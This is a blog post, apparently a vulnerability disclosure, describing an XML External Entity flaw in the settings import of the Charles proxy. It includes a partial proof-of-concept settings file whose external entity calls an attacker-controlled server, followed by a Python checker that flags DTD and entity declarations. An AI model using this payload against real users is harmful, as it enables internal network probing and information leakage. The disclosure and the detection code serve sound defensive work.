Blog posts

Showing posts from November 2018

Charles 4.2.7 XML External Entity

Software Link: https://www.charlesproxy.com
Date: 11.12.2018
Exploit Author: CK01
Version: <=4.2.7

Security Issue: The XML External Entity vulnerability exists in the Charles import/export setup option. If a user imports an attacker's "Charles Settings.xml", the internal network may be probed and information may be leaked.

POC:

1. Charles Setting.xml (127.0.0.1 -> attacker's server):

<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<charles-export>
  <proxyConfiguration>
    <enableSOCKSProxy>false</enableSOCKSProxy>
    <dynamicHTTPPort>false</dynamicHTTPPort>
    <dynamicSOCKSPort>false</dynamicSOCKSPort>
    <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying>
    <port>8888</port>
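A pre-import check for a received settings file, added here as an example (it is not part of the original post and is not Charles code): it lists the DOCTYPE and entity declarations in the XML without resolving them. The function name, the "reject any DOCTYPE" policy and the two sample documents are assumptions; the samples are constructed, with the header of the first taken from the PoC above.

```python
import xml.parsers.expat


def audit_settings_xml(data: bytes) -> dict:
    """Inspect a settings export for DTD content; nothing is ever fetched."""
    findings = {"doctype": False, "external_entities": [],
                "internal_entities": [], "well_formed": True}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = True
        if system_id:  # external DTD subset referenced by the DOCTYPE itself
            findings["external_entities"].append(("<DOCTYPE>", system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if value is None:  # no literal value: the entity is external
            findings["external_entities"].append((name, system_id))
        else:
            findings["internal_entities"].append(name)

    parser = xml.parsers.expat.ParserCreate()
    # No ExternalEntityRefHandler is installed, so expat skips external
    # entities instead of loading them.
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        # The prolog handlers have already fired, so a truncated file is
        # still reported correctly.
        findings["well_formed"] = False
    # Assumed policy: a settings export has no need for a DOCTYPE at all.
    findings["safe_to_import"] = findings["well_formed"] and not findings["doctype"]
    return findings


# Constructed sample: PoC header from the post, minimal closed body.
SUSPICIOUS = b"""<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<charles-export><proxyConfiguration><port>8888</port></proxyConfiguration></charles-export>"""

# Constructed sample: the same body without any DTD.
CLEAN = b"""<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<charles-export><proxyConfiguration><port>8888</port></proxyConfiguration></charles-export>"""

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS), ("clean", CLEAN)):
        print(label, audit_settings_xml(doc))
```

The same policy on the parsing side is to refuse DOCTYPE declarations outright in the XML parser that reads the settings file.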